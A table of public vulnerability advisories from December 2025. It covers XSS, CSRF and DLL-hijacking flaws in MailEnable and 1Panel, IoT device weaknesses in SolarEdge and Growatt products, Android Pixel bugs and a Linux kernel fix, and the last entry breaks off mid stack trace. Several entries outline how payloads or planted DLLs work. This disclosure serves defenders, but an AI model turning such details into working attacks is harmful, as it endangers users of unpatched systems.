| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the FieldCc parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The FieldCc value is not properly sanitized when processed via a GET request and is reflected inside a <script> block in the JavaScript variable var CCFieldProvided. By supplying a crafted payload that terminates the existing LoadCurAddresses() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34402 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-fieldcc-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the FieldTo parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The FieldTo value is not properly sanitized when processed via a GET request and is reflected inside a <script> block in the JavaScript variable var fieldTo. By supplying a crafted payload that terminates the existing Finish() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34403 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-fieldto-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the InstanceScope parameter of /Mondo/lang/sys/Forms/CAL/compose.aspx. The InstanceScope value is not properly sanitized when processed via a GET request and is reflected inside a <script> block in the JavaScript variable var gInstanceScope. By supplying a crafted payload that terminates the existing PageLoad() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34404 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-instancescope-parameter-of-cal-compose-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the Id parameter of /Mobile/ContactDetails.aspx. The Id value is not properly sanitized when processed via a GET request and is reflected within a <script> block in the response. By supplying a crafted payload that terminates an existing JavaScript function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim opens a malicious link. Successful exploitation can redirect victims to malicious sites, steal cookies not protected by HttpOnly, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34406 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-id-parameter-of-mobile-contactdetails-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the theme parameter of /Mondo/lang/sys/Forms/Statistics.aspx. The theme value is insufficiently sanitized when processed via a GET request and is reflected in the response, allowing an attacker to break out of an existing iframe context and inject arbitrary script. A remote attacker can supply a crafted payload that closes the iframe tag, inserts attacker-controlled JavaScript, and comments out remaining code, leading to script execution in a victim's browser when the victim visits a malicious link. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34407 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-theme-parameter-of-statistics-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the Added parameter of /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx. The Added value is not properly sanitized when processed via a GET request and is reflected in the response, allowing an attacker to break out of existing markup and inject arbitrary script. A remote attacker can supply a crafted payload that closes an existing HTML list element, inserts attacker-controlled JavaScript, and comments out remaining code, leading to script execution in a victim's browser when the victim visits a malicious link. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34408 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-added-parameter-of-mai-addrecipientsresult-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the Failed parameter of /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx. The Failed value is not properly sanitized when processed via a GET request and is reflected in the response, allowing an attacker to break out of existing markup and inject arbitrary script. A remote attacker can supply a crafted payload that closes an existing HTML list element, inserts attacker-controlled JavaScript, and comments out remaining code, leading to script execution in a victim's browser when the victim visits a malicious link. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34409 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-failed-parameter-of-mai-addrecipientsresult-aspx |
| LXware--1Panel | 1Panel versions 1.10.33 - 2.0.15 contain a cross-site request forgery (CSRF) vulnerability in the Change Username functionality available from the settings panel (/settings/panel). The endpoint does not implement CSRF protections such as anti-CSRF tokens or Origin/Referer validation. An attacker can craft a malicious webpage that submits a username-change request; when a victim visits the page while authenticated, the browser includes valid session cookies and the request succeeds. This allows an attacker to change the victim's 1Panel username without consent. After the change, the victim is logged out and unable to log in with the previous username, resulting in account lockout and denial of service. | 2025-12-10 | not yet calculated | CVE-2025-34410 | https://github.com/1Panel-dev/1Panel/releases https://1panel.pro/ https://www.vulncheck.com/advisories/1panel-csrf-in-change-username-functionality-allows-account-lockout |
| DigitalPA S.r.l.--Legality WHISTLEBLOWING | Legality WHISTLEBLOWING by DigitalPA contains a protection mechanism failure in which critical HTTP security headers are not emitted by default. Affected deployments omit Content-Security-Policy, Referrer-Policy, Permissions-Policy, Cross-Origin-Embedder-Policy, Cross-Origin-Opener-Policy, and Cross-Origin-Resource-Policy (with CSP delivered via HTML meta elements being inadequate). The absence of these headers weakens browser-side defenses and increases exposure to client-side attacks such as cross-site scripting, clickjacking, referer leakage, and cross-origin data disclosure. | 2025-12-09 | not yet calculated | CVE-2025-34413 | https://seclists.org/fulldisclosure/2025/Dec/0 https://www.digitalpa.net/en/whistleblowing-software-features/ https://www.vulncheck.com/advisories/legality-whisteblowing-missing-critical-http-security-headers |
| Entrust Corporation--Instant Financial Issuance (IF) | Entrust Instant Financial Issuance (IFI) On Premise software (formerly referred to as CardWizard) versions 5.x, prior to 6.10.5, and prior to 6.11.1 contain an insecure .NET Remoting exposure in the Legacy Remoting Service that is enabled by default. The service registers a TCP remoting channel with SOAP and binary formatters configured at TypeFilterLevel=Full and exposes default ObjectURI endpoints. A remote, unauthenticated attacker who can reach the remoting port can invoke the exposed remoting objects to read arbitrary files from the server and coerce outbound authentication, and may achieve arbitrary file write and remote code execution via known .NET Remoting exploitation techniques. This can lead to disclosure of sensitive installation and service-account data and compromise of the affected host. | 2025-12-09 | not yet calculated | CVE-2025-34414 | https://www.entrust.com/products/issuance-systems/instant/financial-card https://www.entrust.com/knowledgebase https://www.vulncheck.com/advisories/entrust-ifi-legacy-remoting-unauthenticated-net-remoting-exposure |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIPO.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIPO.DLL, which is then loaded when the executable starts, resulting in execution of attacker-controlled code with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34416 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaipo-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAISO.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAISO.DLL, which is then loaded when the executable starts, resulting in execution of attacker-controlled code with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34417 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaiso-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIMF.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIMF.DLL, which is then loaded when the executable starts, resulting in execution of attacker-controlled code with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34418 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaimf-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAISM.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAISM.DLL, which is then loaded when the executable starts, resulting in execution of attacker-controlled code with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34419 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaism-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIAM.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIAM.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34420 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaiam-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAISP.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAISP.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34421 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaisp-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIPC.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIPC.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34422 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaipc-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIAU.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIAU.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34423 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaiau-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIDP.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIDP.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34424 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaidp-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the WindowContext parameter of /Mondo/lang/sys/Forms/MAI/compose.aspx. The WindowContext value is not properly sanitized when processed via a GET request and is reflected within a <script> context in the JavaScript variable window.location, allowing an attacker to break out of the existing script and inject arbitrary JavaScript. A remote attacker can supply a crafted payload that terminates the existing ProcessContextSwitchResult() function, inserts attacker-controlled script, and comments out remaining code, leading to script execution in a victim's browser when the victim visits a malicious link or attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34425 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-windowscontext-parameter-of-mai-compose-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.TAB with overly permissive filesystem access. A local authenticated user with read access to this file can recover all user passwords and super-admin credentials, then use them to authenticate to MailEnable services such as POP3, SMTP, or the webmail interface, enabling unauthorized mailbox access and administrative control. | 2025-12-10 | not yet calculated | CVE-2025-34427 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-cleartext-credential-storage-in-auth-tab |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.SAV with overly permissive filesystem access. A local authenticated user with read access to this file can recover all user passwords and super-admin credentials, then use them to authenticate to MailEnable services such as POP3, SMTP, or the webmail interface, enabling unauthorized mailbox access and administrative control. | 2025-12-10 | not yet calculated | CVE-2025-34428 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-cleartext-credential-storage-in-auth-sav |
| LXware--1Panel | 1Panel versions 1.10.33 - 2.0.15 contain a cross-site request forgery (CSRF) vulnerability in the web port configuration functionality. The port-change endpoint lacks CSRF defenses such as anti-CSRF tokens or Origin/Referer validation. An attacker can craft a malicious webpage that submits a port-change request; when a victim visits it while authenticated, the browser includes valid session cookies and the request succeeds. This allows an attacker to change the port on which the 1Panel web service listens, causing loss of access on the original port and resulting in service disruption or denial of service, and may unintentionally expose the service on an attacker-chosen port. | 2025-12-10 | not yet calculated | CVE-2025-34429 | https://github.com/1Panel-dev/1Panel/releases https://1panel.pro/ https://www.vulncheck.com/advisories/1panel-csrf-web-port-configuration-change |
| LXware--1Panel | 1Panel versions 1.10.33 through 2.0.15 contain a cross-site request forgery (CSRF) vulnerability in the panel name management functionality. The affected endpoint does not implement CSRF defenses such as anti-CSRF tokens or Origin/Referer validation. An attacker can craft a malicious webpage that submits a panel-name change request; if a victim visits the page while authenticated, the browser includes valid session cookies and the request succeeds. This allows a remote attacker to change the victim's panel name to an arbitrary value without consent. | 2025-12-10 | not yet calculated | CVE-2025-34430 | https://github.com/1Panel-dev/1Panel/releases https://1panel.pro/ https://www.vulncheck.com/advisories/1panel-csrf-panel-name-modification |
| AnyDesk--AnyDesk | AnyDesk 7.0.15 and 9.0.1 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated SYSTEM privileges. Attackers can exploit the unquoted service path configuration to inject malicious executables that will be run with high-level system permissions. | 2025-12-11 | not yet calculated | CVE-2025-34499 | ExploitDB-52258 ExploitDB-51968 AnyDesk Homepage AnyDesk Software Link VulnCheck Advisory: AnyDesk 9.0.1 Unquoted Service Path Privilege Escalation Vulnerability |
| kodcloud--KodExplorer | KodExplorer 4.52 contains an open redirect vulnerability in the user login page that allows attackers to manipulate the 'link' parameter. Attackers can craft malicious URLs in the link parameter to redirect users to arbitrary external websites after authentication. | 2025-12-11 | not yet calculated | CVE-2025-34504 | ExploitDB-52245 KodExplorer Homepage KodExplorer Release Page VulnCheck Advisory: KodExplorer 4.52 Open Redirect Vulnerability via User Login Endpoint |
| WBCE--WBCE CMS | WBCE CMS version 1.6.3 and prior contains an authenticated remote code execution vulnerability that allows administrators to upload malicious modules. Attackers can craft a specially designed ZIP module with embedded PHP reverse shell code to gain remote system access when the module is installed. | 2025-12-11 | not yet calculated | CVE-2025-34506 | ExploitDB-52132 WBCE CMS Homepage WBCE CMS GitHub Repository YouTube Demonstration Swammers8 GitHub Repository VulnCheck Advisory: WBCE CMS 1.6.3 Authenticated Remote Code Execution via Module Upload |
| SolarEdge--SE3680H | SolarEdge SE3680H has an exposed debug/test interface accessible to unauthenticated actors, allowing disclosure of system internals and execution of debug commands. | 2025-12-12 | not yet calculated | CVE-2025-36743 | https://csirt.divd.nl/CVE-2025-36743 https://csirt.divd.nl/DIVD-2025-00022/ |
| SolarEdge--SE3680H | SolarEdge SE3680H has unauthenticated disclosure of sensitive information during the bootloader loop. While the device repeatedly initializes and waits for boot instructions, the bootloader emits diagnostic output this behavior can leak operating system information. | 2025-12-12 | not yet calculated | CVE-2025-36744 | https://csirt.divd.nl/CVE-2025-36744 https://csirt.divd.nl/DIVD-2025-00022/ |
| SolarEdge--SE3680H | SolarEdge SE3680H ships with an outdated Linux kernel containing unpatched vulnerabilities in core subsystems. An attacker with network or local access can exploit these flaws to achieve remote code execution, privilege escalation, or disclosure of sensitive information. | 2025-12-12 | not yet calculated | CVE-2025-36745 | https://csirt.divd.nl/CVE-2025-36745 https://csirt.divd.nl/DIVD-2025-00022/ |
| SolarEdge--SolarEdge Monitoring platform (SaaS) | SolarEdge monitoring platform contains a Cross‑Site Scripting (XSS) flaw that allows an authenticated user to inject payloads into report names, which may execute in a victim's browser during a deletion attempt. | 2025-12-12 | not yet calculated | CVE-2025-36746 | https://csirt.divd.nl/CVE-2025-36746 https://csirt.divd.nl/DIVD-2025-00022/ |
| Growatt--ShineLan-X | ShineLan-X contains a set of credentials for an FTP server was found within the firmware, allowing testers to establish an insecure FTP connection with the server. This may allow an attacker to replace legitimate files being deployed to devices with their own malicious versions, since the firmware signature verification is not enforced. | 2025-12-13 | not yet calculated | CVE-2025-36747 | https://csirt.divd.nl/CVE-2025-36747/ |
| Growatt--ShineLan-X | ShineLan-X contains a stored cross site scripting (XSS) vulnerability in the local configuration web server. The JavaScript code snippet can be inserted in the communication module's settings center. This may allow attackers to force a legitimate user's browser's JavaScript engine to run malicious code. | 2025-12-13 | not yet calculated | CVE-2025-36748 | https://csirt.divd.nl/CVE-2025-36748/ |
| Growatt--ShineLan-X | ShineLan-X contains a stored cross site scripting (XSS) vulnerability in the Plant Name field. A HTML payload will be displayed on the plant management page via a direct post. This may allow attackers to force a legitimate user's browser's JavaScript engine to run malicious code. | 2025-12-13 | not yet calculated | CVE-2025-36750 | https://csirt.divd.nl/CVE-2025-36750/ |
| Growatt--ShineLan-X | Encryption is missing on the configuration interface for Growatt ShineLan-X and MIC 3300TL-X. This allows an attacker with access to the network to intercept and potentially manipulate communication requests between the inverter and its cloud endpoint. | 2025-12-13 | not yet calculated | CVE-2025-36751 | https://csirt.divd.nl/CVE-2025-36751/ |
| Growatt--ShineLan-X | Growatt ShineLan-X communication dongle has an undocumented backup account with undocumented credentials which allows significant level access to the device, such as allowing any attacker to access the Setting Center. This means that this is effectively backdoor for all devices utilizing a Growatt ShineLan-X communication dongle. | 2025-12-13 | not yet calculated | CVE-2025-36752 | https://csirt.divd.nl/CVE-2025-36752/ |
| Growatt--ShineLan-X | The SWD debug interface on the Growatt ShineLan-X communication dongle is available by default, allowing an attacker to attain debug access to the device and to extracting secrets or domains from within the device | 2025-12-13 | not yet calculated | CVE-2025-36753 | https://csirt.divd.nl/CVE-2025-36753/ |
| Growatt--ShineLan-X | The authentication mechanism on web interface is not properly implemented. It is possible to bypass authentication checks by crafting a post request with new settings since there is no session token or authentication in place. This would allow an attacker for instance to point the device to an arbitrary address for domain name resolution to e.g. facililitate a man-in-the-middle (MitM) attack. | 2025-12-13 | not yet calculated | CVE-2025-36754 | https://csirt.divd.nl/CVE-2025-36754/ |
| CleverDisplay B.V.--BlueOne (CleverDisplay Hardware Player) | The CleverDisplay BlueOne hardware player is designed with its USB interfaces physically enclosed and inaccessible under normal operating conditions. Researchers demonstrated that, after cicumventing the device's protective enclosure, it was possible to connect a USB keyboard and press ESC during boot to access the BIOS setup interface. BIOS settings could be viewed but not modified. This behavior slightly increases the attack surface by exposing internal system information (CWE-1244) once the enclosure is removed, but does not allow integrity or availability compromise under standard or tested configurations. | 2025-12-12 | not yet calculated | CVE-2025-36755 | https://csirt.divd.nl/CVE-2025-5743/ https://csirt.divd.nl/DIVD-2025-00043 |
| Google--Android | In onCreateTasks of CameraActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36889 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In cellular modem, there is a possible denial of service due to a logic error in the code. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36912 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In PrepareWorkloadBuffers of gxp_main_actor.cc, there is a possible double fetch due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36916 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In SwDcpItg of up_L2commonPdcpSecurity.cpp, there is a possible denial of service due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36917 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In aoc_service_read_message of aoc_ipc_core.c, there is a possible out of bounds read due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36918 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In aocc_read of aoc_channel_dev.c, there is a possible double free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36919 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In ProtocolPsUnthrottleApn() of protocolpsadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36921 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In bigo_map of bigo_iommu.c, there is a possible information disclosure due to a use after free. This could lead to local escalation of privilege in the OS Kernel level with System execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36922 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In NrmmDecoder::DecodeSORTransparentContext of cn_NrmmDecoder.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote (proximal/adjacent) escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36923 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In ss_DecodeLcsAssistDataReqMsg(void) of ss_LcsManagement.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote (proximal/adjacent) escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36924 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In WAVES_send_data_to_dsp of libaoc_waves.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36925 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In GetTachyonCommand of tachyon_server_common.h, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36927 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In GetHostAddress of gxp_buffer.h, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36928 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In AreFencesRegistered of gxp_fence_manager.cc, there is a possible information leak due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36929 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In GetHostAddress of gxp_buffer.h, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36930 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In GetHostAddress of gxp_buffer.h, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36931 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In tracepoint_msg_handler of cpm/google/lib/tracepoint/tracepoint_ipc.c, there is a possible memory overwrite due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36932 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In bigo_worker_thread of private/google-modules/video/gchips/bigo.c, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36934 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In trusty_ffa_mem_reclaim of shared-mem-smcall.c, there is a possible memory corruption due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36935 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In GetTachyonCommand of tachyon_server_common.h, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36936 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In AudioDecoder::HandleProduceRequest of audio_decoder.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36937 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Google--Android | In U-Boot of append_uint32_le(), there is a possible fault injection due to a logic error in the code. This could lead to physical escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-11 | not yet calculated | CVE-2025-36938 | https://source.android.com/security/bulletin/pixel/2025-12-01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xsk: avoid data corruption on cq descriptor number Since commit 30f241fcf52a ("xsk: Fix immature cq descriptor production"), the descriptor number is stored in skb control block and xsk_cq_submit_addr_locked() relies on it to put the umem addrs onto pool's completion queue. skb control block shouldn't be used for this purpose as after transmit xsk doesn't have control over it and other subsystems could use it. This leads to the following kernel panic due to a NULL pointer dereference. BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 2 UID: 1 PID: 927 Comm: p4xsk.bin Not tainted 6.16.12+deb14-cloud-amd64 #1 PREEMPT(lazy) Debian 6.16.12-1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014 RIP: 0010:xsk_destruct_skb+0xd0/0x180 [...] Call Trace: <IRQ> ? napi_complete_done+0x7a/0x1a0 ip_rcv_core+0x1bb/0x340 ip_rcv+0x30/0x1f0 __netif_receive_skb_one_core+0x85/0xa0 process_backlog+0x87/0x130 __napi_poll+0x28/0x180 net_rx_action+0x339/0x420 handle_softirqs+0xdc/0x320 ? handle_edge_irq+0x90/0x1e0 do_softirq.part.0+0x3b/0x60 </IRQ> <TASK> __local_bh_enable_ip+0x60/0x70 __dev_direct_xmit+0x14e/0x1f0 __xsk_generic_xmit+0x482/0xb70 ? __remove_hrtimer+0x41/0xa0 ? __xsk_generic_xmit+0x51/0xb70 ? _raw_spin_unlock_irqrestore+0xe/0x40 xsk_sendmsg+0xda/0x1c0 __sys_sendto+0x1ee/0x200 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x84/0x2f0 ? 